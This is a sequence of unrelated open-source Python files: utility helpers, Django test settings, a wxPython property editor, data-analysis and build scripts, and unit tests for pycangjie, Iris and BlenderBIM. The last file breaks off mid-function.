                                                      simpchar.encode("utf-8"),
                                                      code.encode("utf-8"),
                                                      frequency))

        expected = sorted(expected, key=operator.attrgetter('chchar', 'code'))

        try:
            # And compare with what pycangjie produces
            results = sorted(self.cj.get_characters(input_code),
                             key=operator.attrgetter('chchar', 'code'))

            self.assertEqual(results, expected)

        except cangjie.errors.CangjieNoCharsError:
            self.assertEqual(len(expected), 0)

# -*- coding: utf-8 -*-
"""
This module put my utility functions
"""
__author__ = "Jiang Yu-Kuan <yukuan.jiang@gmail.com>"
__date__ = "2016/02/08 (initial version) ~ 2019/04/17 (last revision)"

import re
import os
import sys


#------------------------------------------------------------------------------
# File
#------------------------------------------------------------------------------

def save_utf8_file(fn, lines):
    """Save string lines into an UTF8 text files.
    """
    with open(fn, "w") as out_file:
        out_file.write("\n".join(lines).encode("utf-8"))


def main_basename(path):
    r"""Return a main name of a basename of a given file path.

    Example
    -------
    >>> main_basename('c:\code\langconv\MsgID.h')
    'MsgID.h'
    """
    base = os.path.basename(path)
    base_main, _base_ext = os.path.splitext(base)
    return base_main


#------------------------------------------------------------------------------
# Math
#------------------------------------------------------------------------------

def is_numeric(str):
    try:
        _offset = int(eval(str))
    except:
        return False
    return True


#------------------------------------------------------------------------------
# String
#------------------------------------------------------------------------------

def replace_chars(text, replaced_pairs='', deleted_chars=''):
    """Return a char replaced text.

    Arguments
    ---------
    text -- the text
    replaced_pairs -- the replaced chars

    Example
    -------
    >>> replaced = [('a','b'), ('c','d')]
    >>> removed = 'e'
    >>> replace_chars('abcde', replaced, removed)
    'bbdd'
    """
    for old, new in replaced_pairs:
        text = text.replace(old, new)
    for ch in deleted_chars:
        text = text.replace(ch, '')
    return text


def camel_case(string):
    """Return camel case string from a space-separated string.

    Example
    -------
    >>> camel_case('good job')
    'GoodJob'
    """
    return ''.join(w.capitalize() for w in string.split())


def replace_punctuations(text):
    """Replace punctuation characters with abbreviations for a string.
    """
    punctuations = [
        ('?', 'Q'),   # Q:  question mark
        ('.', 'P'),   # P:  period; full stop
        ('!', 'E'),   # E:  exclamation mark
        ("'", 'SQ'),  # SQ: single quotation mark; single quote
        ('"', 'DQ'),  # DQ: double quotation mark; double quotes
        ('(', 'LP'),  # LP: left parenthese
        (')', 'RP'),  # RP: right parenthese
        (':', 'Cn'),  # Cn: colon
        (',', 'Ca'),  # Ca: comma
        (';', 'S'),   # S:  semicolon
    ]
    deleted = '+-*/^=%$#@|\\<>{}[]'
    return replace_chars(text, punctuations, deleted)


def remain_alnum(text):
    """Remain digits and English letters of a string.
    """
    return ''.join(c for c in text if c.isalnum()
                                   and ord(' ') <= ord(c) <= ord('z'))


#------------------------------------------------------------------------------
# For code generation
#------------------------------------------------------------------------------

def c_identifier(text):
    """Convert input text into an legal identifier in C.

    Example
    -------
    >>> c_identifier("Hello World")
    'HelloWorld'
    >>> c_identifier("Anti-Shake")
    'Antishake'
    """
    if ' ' in text:
        text = camel_case(text)
    text = re.sub(r'\+\d+', lambda x: x.group().replace('+', 'P'), text)
    text = re.sub(r'\-\d+', lambda x: x.group().replace('-', 'N'), text)
    text = replace_punctuations(text)
    return remain_alnum(text)


def wrap_header_guard(lines, h_fn):
    """Wrap a C header guard for a given line list.
    """
    def underscore(txt):
        """Return an under_scores text from a CamelCase text.

        This function will leave a CamelCase text unchanged.
        """
        s1 = re.sub('(.)([A-Z][a-z]+)', r'\1_\2', txt)
        return re.sub('([a-z0-9])([A-Z])', r'\1_\2', s1).lower()

    h_fn_sig = '%s_H_' % underscore(main_basename(h_fn)).upper()
    begin = ['#ifndef %s' % h_fn_sig]
    begin += ['#define %s' % h_fn_sig, '', '']
    end = ['', '', '#endif // %s' % h_fn_sig, '']
    return begin + lines + end


def prefix_info(lines, software, version, author, comment_mark='//'):
    """Prefix information to the given lines with given comment-mark.
    """
    prefix = ['%s Generated by the %s v%s' % (comment_mark,
              software, version)]
    prefix += ['%s    !author: %s' % (comment_mark, author)]
    prefix += ['%s    !trail: %s %s' % (comment_mark,
               os.path.basename(sys.argv[0]), ' '.join(sys.argv[1:]))]
    return prefix + lines




" Settings for tests. "
from settings.project import *

# Databases
DATABASES = {
    'default': {
        'ENGINE': 'django.db.backends.sqlite3',
        'NAME': ':memory:',
        'USER': '',
        'PASSWORD': '',
        'TEST_CHARSET': 'utf8',
    }}

# Caches
CACHES['default']['BACKEND'] = 'django.core.cache.backends.locmem.LocMemCache'
CACHES['default']['KEY_PREFIX'] = '_'.join((PROJECT_NAME, 'TST'))

# pymode:lint_ignore=W404

#!/usr/bin/python
# -*- coding: utf-8 -*-

"Visual Property Editor (using wx PropertyGrid) of gui2py's components"

__author__ = "Mariano Reingart (reingart@gmail.com)"
__copyright__ = "Copyright (C) 2013- Mariano Reingart"
__license__ = "LGPL 3.0"

# some parts where inspired or borrowed from wxFormBuilders & wxPython examples


import sys, time, math, os, os.path

import wx
_ = wx.GetTranslation
import wx.propgrid as wxpg

from gui.component import InitSpec, StyleSpec, Spec, EventSpec, DimensionSpec
from gui.font import Font

DEBUG = False

class PropertyEditorPanel(wx.Panel):

    def __init__( self, parent, log ):
        wx.Panel.__init__(self, parent, wx.ID_ANY)
        self.log = log
        self.callback = None

        self.panel = panel = wx.Panel(self, wx.ID_ANY)
        topsizer = wx.BoxSizer(wx.VERTICAL)

        # Difference between using PropertyGridManager vs PropertyGrid is that
        # the manager supports multiple pages and a description box.
        self.pg = pg = wxpg.PropertyGrid(panel,
                        style=wxpg.PG_SPLITTER_AUTO_CENTER |
                              wxpg.PG_AUTO_SORT |
                              wxpg.PG_TOOLBAR)

        # Show help as tooltips
        pg.SetExtraStyle(wxpg.PG_EX_HELP_AS_TOOLTIPS)

        pg.Bind( wxpg.EVT_PG_CHANGED, self.OnPropGridChange )
        pg.Bind( wxpg.EVT_PG_PAGE_CHANGED, self.OnPropGridPageChange )
        pg.Bind( wxpg.EVT_PG_SELECTED, self.OnPropGridSelect )
        pg.Bind( wxpg.EVT_PG_RIGHT_CLICK, self.OnPropGridRightClick )

        ##pg.AddPage( "Page 1 - Testing All" )
        # store the property grid for future reference
        self.pg = pg
        
        # load empty object (just draws categories)
        self.load_object(None)
        
        # sizing stuff:        
        topsizer.Add(pg, 1, wx.EXPAND)
        panel.SetSizer(topsizer)
        topsizer.SetSizeHints(panel)

        sizer = wx.BoxSizer(wx.VERTICAL)
        sizer.Add(panel, 1, wx.EXPAND)
        self.SetSizer(sizer)
        self.SetAutoLayout(True)

    def load_object(self, obj, callback=None):
        pg = self.pg                    # get the property grid reference
        self.callback = callback        # store the update method
        
        # delete all properties
        pg.Clear()
        
        # clean references and aux structures
        appended = set()
        self.obj = obj
        self.groups = {}
        
        # loop on specs and append each property (categorized):
        for i, cat, class_ in ((1, 'Init Specs', InitSpec), 
                               (2, 'Dimension Specs', DimensionSpec),
                               (3, 'Style Specs', StyleSpec), 
                               (5, 'Events', EventSpec),
                               (4, 'Basic Specs', Spec),
                              ): 
            
            pg.Append(wxpg.PropertyCategory("%s - %s" % (i, cat)))
            if obj is None:
                continue
            specs = sorted(obj._meta.specs.items(), key=lambda it: it[0])
            for name, spec in specs:
                if DEBUG: print "setting prop", spec, class_, spec.type
                if isinstance(spec, class_):
                    prop = {'string': wxpg.StringProperty,
                            'integer': wxpg.IntProperty,
                            'float': wxpg.FloatProperty,
                            'boolean': wxpg.BoolProperty,
                            'text': wxpg.LongStringProperty,
                            'code': wxpg.LongStringProperty,
                            'enum': wxpg.EnumProperty,
                            'edit_enum': wxpg.EditEnumProperty,
                            'expr': wxpg.StringProperty,
                            'array': wxpg.ArrayStringProperty,
                            'font': wxpg.FontProperty,
                            'image_file': wxpg.ImageFileProperty,
                            'colour': wxpg.ColourProperty}.get(spec.type)
                    if prop and name not in appended:
                        value = getattr(obj, name)
                        if DEBUG: print "name", name, value
                        if spec.type == "code" and value is None:
                            value = "" 
                        if spec.type == "boolean" and value is None:
                            value = False
                        if spec.type == "integer" and value is None:
                            value = -1
                        if spec.type in ("string", "text") and value is None:
                            value = ""
                        if spec.type == "expr":
                            value = repr(value)
                        if spec.type == "font":
                            if value is None:
                                value = wx.NullFont
                            else:
                                value = value.get_wx_font()
                        if callable(value):
                            # event binded at runtime cannot be modified:
                            value = str(value)
                            readonly = True
                        else:
                            readonly = False
                        if spec.type == "enum":
                            prop = prop(name, name, 
                                           spec.mapping.keys(), 
                                           spec.mapping.values(),
                                           value=spec.mapping.get(value, 0))
                        elif spec.type == "edit_enum":
                            prop = prop(name, name, 
                                           spec.mapping.keys(), 
                                           range(len(spec.mapping.values())),
                                           value=spec.mapping[value])
                        else:
                            try:
                                prop = prop(name, value=value)
                            except Exception, e:
                                print "CANNOT LOAD PROPERTY", name, value, e
                        
                        prop.SetPyClientData(spec)
                        appended.add(name)
                        
                        if spec.group is None:
                            pg.Append(prop)
                            if readonly:
                                pg.SetPropertyReadOnly(prop)
                        else:
                            # create a group hierachy (wxpg uses dot notation)
                            group = ""
                            prop_parent = None
                            for grp in spec.group.split("."):
                                prev_group = group              # ancestor
                                group += ("." if group else "") + grp   # path
                                if group in self.groups:
                                    prop_parent = self.groups[group]
                                else:
                                    prop_group = wxpg.StringProperty(grp,
                                            value="<composed>")
                                    if not prop_parent:
                                        pg.Append(prop_group)
                                    else:
                                        pg.AppendIn(prev_group, prop_group)                                    
                                    prop_parent = prop_group
                                    self.groups[group] = prop_parent
                                    pg.SetPropertyReadOnly(group)
                            pg.AppendIn(spec.group, prop)
                            pg.Collapse(spec.group)
                            name = spec.group + "." + name
                                          
                        if spec.type == "boolean":
                            pg.SetPropertyAttribute(name, "UseCheckbox", True)
                        doc = spec.__doc__ 
                        if doc:
                            pg.SetPropertyHelpString(name, doc)
                        

    def edit(self, name=""):
        "Programatically select a (default) property to start editing it"
        # for more info see DoSelectAndEdit in propgrid.cpp
        for name in (name, "label", "value", "text", "title", "filename", 
                           "name"):
            prop = self.pg.GetPropertyByName(name)
            if prop is not None:
                break
        self.Parent.SetFocus()
        self.Parent.Raise()
        self.pg.SetFocus()
        # give time to the ui to show the prop grid and set focus:
        wx.CallLater(250, self.select, prop.GetName())

    def select(self, name, flags=0):
        "Select a property (and start the editor)"
        # do not call this directly from another window, use edit() instead
        # // wxPropertyGrid::DoSelectProperty flags (selFlags) -see propgrid.h-
        wxPG_SEL_FOCUS=0x0001  # Focuses to created editor
        wxPG_SEL_FORCE=0x0002  # Forces deletion and recreation of editor
        flags |= wxPG_SEL_FOCUS # | wxPG_SEL_FORCE
        prop = self.pg.GetPropertyByName(name)
        self.pg.SelectProperty(prop, flags)
        if DEBUG: print "selected!", prop
    
    def OnPropGridChange(self, event):
        p = event.GetProperty()
        if DEBUG: print "change!", p
        if p:
            name = p.GetName()
            spec = p.GetPyClientData()
            if spec and 'enum' in spec.type:
                value = p.GetValueAsString()
            else:
                value = p.GetValue()
            #self.log.write(u'%s changed to "%s"\n' % (p,p.GetValueAsString()))
            # if it a property child (parent.child), extract its name
            if "." in name:
                name = name[name.rindex(".") + 1:]
            if spec and not name in self.groups:                
                if name == 'font':  # TODO: detect property type
                    # create a gui font from the wx.Font
                    font = Font()
                    font.set_wx_font(value)
                    value = font
                # expressions must be evaluated to store the python object
                if spec.type == "expr":
                    value = eval(value)
                # re-create the wx_object with the new property value
                # (this is required at least to apply new styles and init specs)
                if DEBUG: print "changed", self.obj.name
                kwargs = {str(name): value}
                wx.CallAfter(self.obj.rebuild,  **kwargs)
                if name == 'name':
                    wx.CallAfter(self.callback, **dict(name=self.obj.name))

    def OnPropGridSelect(self, event):
        p = event.GetProperty()
        if p:
            self.log.write(u'%s selected\n' % (event.GetProperty().GetName()))
        else:
            self.log.write(u'Nothing selected\n')

    def OnDeleteProperty(self, event):
        p = self.pg.GetSelectedProperty()
        if p:
            self.pg.DeleteProperty(p)
        else:
            wx.MessageBox("First select a property to delete")

    def OnReserved(self, event):
        pass

    def OnPropGridRightClick(self, event):
        p = event.GetProperty()
        if p:
            self.log.write(u'%s right clicked\n' % (event.GetProperty().GetName()))
        else:
            self.log.write(u'Nothing right clicked\n')
        #self.obj.get_parent().Refresh()

    def OnPropGridPageChange(self, event):
        index = self.pg.GetSelectedPage()
        self.log.write('Page Changed to \'%s\'\n' % (self.pg.GetPageName(index)))



if __name__ == '__main__':
    import sys,os
    app = wx.App()
    f = wx.Frame(None)
    
    from gui.controls import Button, Label, TextBox, CheckBox, ListBox, ComboBox
    frame = wx.Frame(None)
    #o = Button(frame, name="btnTest", label="click me!", default=True)
    #o = Label(frame, name="lblTest", alignment="right", size=(-1, 500), text="hello!")
    o = TextBox(frame, name="txtTest", border=False, text="hello world!")
    #o = CheckBox(frame, name="chkTest", border='none', label="Check me!")
    #o = ListBox(frame, name="lstTest", border='none', 
    #            items={'datum1': 'a', 'datum2':'b', 'datum3':'c'},
    #            multiselect="--multiselect" in sys.argv)
    #o = ComboBox(frame, name="cboTest",
    #            items={'datum1': 'a', 'datum2':'b', 'datum3':'c'},
    #            readonly='--readonly' in sys.argv,
    #            )
    frame.Show()

    log = sys.stdout
    w = PropertyEditorPanel(f, log)
    w.load_object(o)
    f.Show()
    app.MainLoop()


#!/usr/bin/python3

import sys
from pathlib import Path

list_scope_path = Path("./list_scope_tokens.txt")
keyword_bit = 13
list_scope_bit = 14

def main():
	if len(sys.argv) < 2:
		print("Error: Must specify an argument of either 'tokens' or 'emitters'!", file=sys.stderr)
		return 1

	list_scopes = set()

	with list_scope_path.open('r') as f:
		for line in f:
			line = line.strip()
			if line.startswith('#') or len(line) == 0:
				continue
			list_scopes.add(line)

	max_kw_len = max( len(kw) for kw in list_scopes )

	if sys.argv[1] == 'tokens':
		t_id = (1 << (keyword_bit - 1)) | (1 << (list_scope_bit-1))

		for t in sorted(list_scopes):
			print('  {:<{width}} = 0x{:4X};'.format(t.upper(), t_id, width=max_kw_len))
			t_id += 1

	elif sys.argv[1] == 'emitters':
		for t in sorted(list_scopes):
			print('  {:<{width}} => T_{}(Lexeme);'.format('"' + t + '"', t.upper(), width = max_kw_len + 2))
	else:
		print("Error: Must specify an argument of either 'tokens' or 'emitters'!", file=sys.stderr)
		return 1

	return 0


if __name__ == '__main__':
    sys.exit(main())

"""
Copyright (C) 2013 Matthew Woodruff

This script is free software: you can redistribute it and/or modify
it under the terms of the GNU Lesser General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.

This script is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU Lesser General Public License for more details.

You should have received a copy of the GNU Lesser General Public License
along with this script. If not, see <http://www.gnu.org/licenses/>.

===========================================================

Coming in: one of 36 algo/problem combinations. 50 seeds in
one file.  Also the _Sobol file specifying the 
parameterization for each row, as well as the parameters
file itself.
Going out: stats: mean, quantile, variance
           grouped by parameterization
           grouped by some or all 2d combinations of 
           parameters
           
"""
import argparse
import pandas
import numpy
import re
import os
import copy

def is_quantile(stat):
    return re.match("q[0-9][0-9]?$", stat)

def is_stat(stat):
    if stat in ["mean", "variance", "min", "max", "q100"]:
        return stat
    elif is_quantile(stat):
        return stat
    else:
        raise argparse.ArgumentTypeError(
                "Invalid statistic {0}".format(stat))

def get_args():
    parser = argparse.ArgumentParser()
    parser.add_argument("data", 
                        type=argparse.FileType("r"),
                        help="data file to be summarized."
                             "Should have columns seed, "\
                             "set, and metrics columns.")
    parser.add_argument("parameterizations",
                        type=argparse.FileType("r"),
                        help="file containing parameter"\
                             "izations.  Number of param"\
                             "eterizations should be the "\
                             "same as number of rows per "\
                             "seed in the data file."
                       )
    parser.add_argument("parameters",
                        type=argparse.FileType("r"),
                        help="file describing parameters. "\
                             "Should have as many rows as "\
                             "parameterizations file has "\
                             "columns."
                       )
    stats = ["mean", "variance", "q10", "q50", "q90"]
    parser.add_argument("-s", "--stats", nargs="+",
                        default = stats, type = is_stat,
                        help="statistics to compute")
    parser.add_argument("-g", "--group", nargs="+",
                        help="parameters by which to "\
                             "group.  Names should be "\
                             "found in the parameters "\
                             "file.  "
                       )
    parser.add_argument("-d", "--deltas",
                        help="If group is specified, "\
                             "deltas may be used to impose "\
                             "grid boxes on the summary "\
                             "rather than using point "\
                             "values.",
                         nargs="+", type = float
                       )
    parser.add_argument("-o", "--output-directory",
                        default="/gpfs/scratch/mjw5407/"
                                "task1/stats/"
                       )
    return parser.parse_args()

def compute(data, stat):
    if stat == "mean":
        return data.mean()
    if stat == "variance":
        return data.var()
    if is_quantile(stat):
        quantile = float(stat[1:]) / 100.0
        if quantile == 0.0:
            return data.min()
        return data.quantile(quantile)
    if stat == "max" or stat == "q100":
        return data.max()
    if stat == "min":
        return data.min()

def analyze(data, stats, group=None, deltas=None):
    results = []
    if group is None:
        group = ["Set"]
    togroupby = copy.copy(group)
    ii = 0
    if deltas is None:
        togroupby = group
    else:
        while ii < len(group) and ii < len(deltas):
            colname = "grid_{0}".format(group[ii])
            gridnumbers = numpy.floor(data[group[ii]].apply(
                            lambda val: val / deltas[ii]))
            data[colname] = gridnumbers.apply(
                            lambda val: val * deltas[ii])
            togroupby[ii] = colname
            ii += 1
        
    print "analyzing grouped by {0}".format(group)
    gb = data.groupby(togroupby)
    for stat in stats:
        print "computing {0}".format(stat)
        tag = "{0}_{1}".format("_".join(group), stat)
        results.append((tag, compute(gb, stat)))
        
    return results

def write_result(infn, result, outputdir):
    fn = "_".join([result[0], os.path.basename(infn)])
    fn = re.sub("\.hv$", "", fn)
    fn = os.path.join(outputdir, fn)
    print "writing {0}".format(fn)
    result[1].to_csv(fn, sep=" ", index=True)    

def cli():
    args = get_args()
    data = pandas.read_table(args.data, sep=" ")
    parameters = pandas.read_table(
                               args.parameters, sep=" ",
                               names=["name","low","high"],
                               header=None)
    param_names = parameters["name"].values
    parameterizations = pandas.read_table(
                               args.parameterizations,
                               sep=" ",
                               names = param_names,
                               header = None)
    data = data.join(parameterizations, on=["Set"], 
                     how="outer")

    if args.deltas is not None:
        deltas = args.deltas
    else:
        deltas = []

    results = analyze(data, args.stats, args.group, deltas)
    for result in results:
        write_result(args.data.name, result, 
                     args.output_directory)

if __name__ == "__main__":
    cli()
# vim:ts=4:sw=4:expandtab:ai:colorcolumn=60:number:fdm=indent

# (C) British Crown Copyright 2014 - 2015, Met Office
#
# This file is part of Iris.
#
# Iris is free software: you can redistribute it and/or modify it under
# the terms of the GNU Lesser General Public License as published by the
# Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Iris is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with Iris.  If not, see <http://www.gnu.org/licenses/>.
"""
Test function :func:`iris.fileformats._pyke_rules.compiled_krb.\
fc_rules_cf_fc.build_auxilliary_coordinate`.

"""

from __future__ import (absolute_import, division, print_function)
from six.moves import (filter, input, map, range, zip)  # noqa

# import iris tests first so that some things can be initialised before
# importing anything else
import iris.tests as tests

import numpy as np
import mock

from iris.coords import AuxCoord
from iris.fileformats._pyke_rules.compiled_krb.fc_rules_cf_fc import \
    build_auxiliary_coordinate


class TestBoundsVertexDim(tests.IrisTest):
    def setUp(self):
        # Create coordinate cf variables and pyke engine.
        points = np.arange(6).reshape(2, 3)
        self.cf_coord_var = mock.Mock(
            dimensions=('foo', 'bar'),
            cf_name='wibble',
            standard_name=None,
            long_name='wibble',
            units='m',
            shape=points.shape,
            dtype=points.dtype,
            __getitem__=lambda self, key: points[key])

        self.engine = mock.Mock(
            cube=mock.Mock(),
            cf_var=mock.Mock(dimensions=('foo', 'bar')),
            filename='DUMMY',
            provides=dict(coordinates=[]))

        # Create patch for deferred loading that prevents attempted
        # file access. This assumes that self.cf_bounds_var is
        # defined in the test case.
        def patched__getitem__(proxy_self, keys):
            variable = None
            for var in (self.cf_coord_var, self.cf_bounds_var):
                if proxy_self.variable_name == var.cf_name:
                    return var[keys]
            raise RuntimeError()

        self.deferred_load_patch = mock.patch(
            'iris.fileformats.netcdf.NetCDFDataProxy.__getitem__',
            new=patched__getitem__)

    def test_slowest_varying_vertex_dim(self):
        # Create the bounds cf variable.
        bounds = np.arange(24).reshape(4, 2, 3)
        self.cf_bounds_var = mock.Mock(
            dimensions=('nv', 'foo', 'bar'),
            cf_name='wibble_bnds',
            shape=bounds.shape,
            dtype=bounds.dtype,
            __getitem__=lambda self, key: bounds[key])

        # Expected bounds on the resulting coordinate should be rolled so that
        # the vertex dimension is at the end.
        expected_bounds = np.rollaxis(bounds, 0, bounds.ndim)
        expected_coord = AuxCoord(
            self.cf_coord_var[:],
            long_name=self.cf_coord_var.long_name,
            var_name=self.cf_coord_var.cf_name,
            units=self.cf_coord_var.units,
            bounds=expected_bounds)

        # Patch the helper function that retrieves the bounds cf variable.
        # This avoids the need for setting up further mocking of cf objects.
        get_cf_bounds_var_patch = mock.patch(
            'iris.fileformats._pyke_rules.compiled_krb.'
            'fc_rules_cf_fc.get_cf_bounds_var',
            return_value=self.cf_bounds_var)

        # Asserts must lie within context manager because of deferred loading.
        with self.deferred_load_patch, get_cf_bounds_var_patch:
            build_auxiliary_coordinate(self.engine, self.cf_coord_var)

            # Test that expected coord is built and added to cube.
            self.engine.cube.add_aux_coord.assert_called_with(
                expected_coord, [0, 1])

            # Test that engine.provides container is correctly populated.
            expected_list = [(expected_coord, self.cf_coord_var.cf_name)]
            self.assertEqual(self.engine.provides['coordinates'],
                             expected_list)

    def test_fastest_varying_vertex_dim(self):
        bounds = np.arange(24).reshape(2, 3, 4)
        self.cf_bounds_var = mock.Mock(
            dimensions=('foo', 'bar', 'nv'),
            cf_name='wibble_bnds',
            shape=bounds.shape,
            dtype=bounds.dtype,
            __getitem__=lambda self, key: bounds[key])

        expected_coord = AuxCoord(
            self.cf_coord_var[:],
            long_name=self.cf_coord_var.long_name,
            var_name=self.cf_coord_var.cf_name,
            units=self.cf_coord_var.units,
            bounds=bounds)

        get_cf_bounds_var_patch = mock.patch(
            'iris.fileformats._pyke_rules.compiled_krb.'
            'fc_rules_cf_fc.get_cf_bounds_var',
            return_value=self.cf_bounds_var)

        # Asserts must lie within context manager because of deferred loading.
        with self.deferred_load_patch, get_cf_bounds_var_patch:
            build_auxiliary_coordinate(self.engine, self.cf_coord_var)

            # Test that expected coord is built and added to cube.
            self.engine.cube.add_aux_coord.assert_called_with(
                expected_coord, [0, 1])

            # Test that engine.provides container is correctly populated.
            expected_list = [(expected_coord, self.cf_coord_var.cf_name)]
            self.assertEqual(self.engine.provides['coordinates'],
                             expected_list)

    def test_fastest_with_different_dim_names(self):
        # Despite the dimension names ('x', and 'y') differing from the coord's
        # which are 'foo' and 'bar' (as permitted by the cf spec),
        # this should still work because the vertex dim is the fastest varying.
        bounds = np.arange(24).reshape(2, 3, 4)
        self.cf_bounds_var = mock.Mock(
            dimensions=('x', 'y', 'nv'),
            cf_name='wibble_bnds',
            shape=bounds.shape,
            dtype=bounds.dtype,
            __getitem__=lambda self, key: bounds[key])

        expected_coord = AuxCoord(
            self.cf_coord_var[:],
            long_name=self.cf_coord_var.long_name,
            var_name=self.cf_coord_var.cf_name,
            units=self.cf_coord_var.units,
            bounds=bounds)

        get_cf_bounds_var_patch = mock.patch(
            'iris.fileformats._pyke_rules.compiled_krb.'
            'fc_rules_cf_fc.get_cf_bounds_var',
            return_value=self.cf_bounds_var)

        # Asserts must lie within context manager because of deferred loading.
        with self.deferred_load_patch, get_cf_bounds_var_patch:
            build_auxiliary_coordinate(self.engine, self.cf_coord_var)

            # Test that expected coord is built and added to cube.
            self.engine.cube.add_aux_coord.assert_called_with(
                expected_coord, [0, 1])

            # Test that engine.provides container is correctly populated.
            expected_list = [(expected_coord, self.cf_coord_var.cf_name)]
            self.assertEqual(self.engine.provides['coordinates'],
                             expected_list)


if __name__ == '__main__':
    tests.main()

import os
import platform
from setuptools import setup, Extension
from distutils.util import convert_path
from Cython.Build import cythonize

system = platform.system()

## paths settings
# Linux
if 'Linux' in system:
    CLFFT_DIR = r'/home/gregor/devel/clFFT'
    CLFFT_LIB_DIRS = [r'/usr/local/lib64']
    CLFFT_INCL_DIRS = [os.path.join(CLFFT_DIR, 'src', 'include'), ]
    CL_INCL_DIRS = ['/opt/AMDAPPSDK-3.0/include']
    EXTRA_COMPILE_ARGS = []
    EXTRA_LINK_ARGS = []

#Windows
elif 'Windows' in system:
    CLFFT_DIR = r'C:\Users\admin\Devel\clFFT-Full-2.12.2-Windows-x64'
    CLFFT_LIB_DIRS = [os.path.join(CLFFT_DIR, 'lib64\import')]
    CLFFT_INCL_DIRS = [os.path.join(CLFFT_DIR, 'include'), ]
    CL_DIR = os.getenv('AMDAPPSDKROOT')
    CL_INCL_DIRS = [os.path.join(CL_DIR, 'include')]
    EXTRA_COMPILE_ARGS = []
    EXTRA_LINK_ARGS = []
    
# macOS
elif 'Darwin' in system:
    CLFFT_DIR = r'/Users/gregor/Devel/clFFT'
    CLFFT_LIB_DIRS = [r'/Users/gregor/Devel/clFFT/src/library']
    CLFFT_INCL_DIRS = [os.path.join(CLFFT_DIR, 'src', 'include'), ]
    CL_INCL_DIRS = []
    EXTRA_COMPILE_ARGS = ['-stdlib=libc++']
    EXTRA_LINK_ARGS = ['-stdlib=libc++']

import Cython.Compiler.Options
Cython.Compiler.Options.generate_cleanup_code = 2

extensions = [
    Extension("gpyfft.gpyfftlib",
              [os.path.join('gpyfft', 'gpyfftlib.pyx')],
              include_dirs= CLFFT_INCL_DIRS + CL_INCL_DIRS,
              extra_compile_args=EXTRA_COMPILE_ARGS,
              extra_link_args=EXTRA_LINK_ARGS,
              libraries=['clFFT'],
              library_dirs = CLFFT_LIB_DIRS,
              language='c++',
              )
    ]

def copy_clfftdll_to_package():
    import shutil
    shutil.copy(
        os.path.join(CLFFT_DIR, 'bin', 'clFFT.dll'),
        'gpyfft')

    shutil.copy(
        os.path.join(CLFFT_DIR, 'bin', 'StatTimer.dll'),
        'gpyfft')
    print("copied clFFT.dll, StatTimer.dll")

package_data = {}
if 'Windows' in platform.system():
    copy_clfftdll_to_package()
    package_data.update({'gpyfft': ['clFFT.dll', 'StatTimer.dll']},)


def get_version():
    main_ns = {}
    version_path = convert_path('gpyfft/version.py')
    with open(version_path) as version_file:
        exec(version_file.read(), main_ns)
    version = main_ns['__version__']
    return version


def get_readme():
    dirname = os.path.dirname(os.path.abspath(__file__))
    with open(os.path.join(dirname, "README.md"), "r") as fp:
        long_description = fp.read()
    return long_description


install_requires = ["numpy", "pyopencl"]
setup_requires = ["numpy", "cython"]


setup(
    name='gpyfft',
    version=get_version(),
    description='A Python wrapper for the OpenCL FFT library clFFT',
    long_description=get_readme(),
    url=r"https://github.com/geggo/gpyfft",
    maintainer='Gregor Thalhammer',
    maintainer_email='gregor.thalhammer@gmail.com',
    license='LGPL',
    packages=['gpyfft', "gpyfft.test"],
    ext_modules=cythonize(extensions),
    package_data=package_data,
    install_requires=install_requires,
    setup_requires=setup_requires,
    )

# BlenderBIM Add-on - OpenBIM Blender Add-on
# Copyright (C) 2021 Dion Moult <dion@thinkmoult.com>
#
# This file is part of BlenderBIM Add-on.
#
# BlenderBIM Add-on is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# BlenderBIM Add-on is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with BlenderBIM Add-on.  If not, see <http://www.gnu.org/licenses/>.


import os
import re
import bpy
import pytest
import webbrowser
import blenderbim
import ifcopenshell
import ifcopenshell.util.representation
from blenderbim.bim.ifc import IfcStore
from mathutils import Vector

# Monkey-patch webbrowser opening since we want to test headlessly
webbrowser.open = lambda x: True


variables = {"cwd": os.getcwd(), "ifc": "IfcStore.get_file()"}


class NewFile:
    @pytest.fixture(autouse=True)
    def setup(self):
        IfcStore.purge()
        bpy.ops.wm.read_homefile(app_template="")
        if bpy.data.objects:
            bpy.data.batch_remove(bpy.data.objects)
            bpy.ops.outliner.orphans_purge(do_local_ids=True, do_linked_ids=True, do_recursive=True)
        blenderbim.bim.handler.setDefaultProperties(None)


class NewIfc:
    @pytest.fixture(autouse=True)
    def setup(self):
        IfcStore.purge()
        bpy.ops.wm.read_homefile(app_template="")
        bpy.data.batch_remove(bpy.data.objects)
        bpy.ops.outliner.orphans_purge(do_local_ids=True, do_linked_ids=True, do_recursive=True)
        blenderbim.bim.handler.setDefaultProperties(None)
        bpy.ops.bim.create_project()


def scenario(function):
    def subfunction(self):
        run(function(self))

    return subfunction


def scenario_debug(function):
    def subfunction(self):
        run_debug(function(self))

    return subfunction


def an_empty_ifc_project():
    bpy.ops.bim.create_project()


def i_add_a_cube():
    bpy.ops.mesh.primitive_cube_add()


def i_add_a_cube_of_size_size_at_location(size, location):
    bpy.ops.mesh.primitive_cube_add(size=float(size), location=[float(co) for co in location.split(",")])


def the_object_name_is_selected(name):
    i_deselect_all_objects()
    additionally_the_object_name_is_selected(name)


def additionally_the_object_name_is_selected(name):
    obj = bpy.context.scene.objects.get(name)
    if not obj:
        assert False, 'The object "{name}" could not be selected'
    bpy.context.view_layer.objects.active = obj
    obj.select_set(True)


def i_deselect_all_objects():
    bpy.context.view_layer.objects.active = None
    bpy.ops.object.select_all(action="DESELECT")


def i_am_on_frame_number(number):
    bpy.context.scene.frame_set(int(number))


def i_set_prop_to_value(prop, value):
    try:
        eval(f"bpy.context.{prop}")
    except:
        assert False, "Property does not exist"
    try:
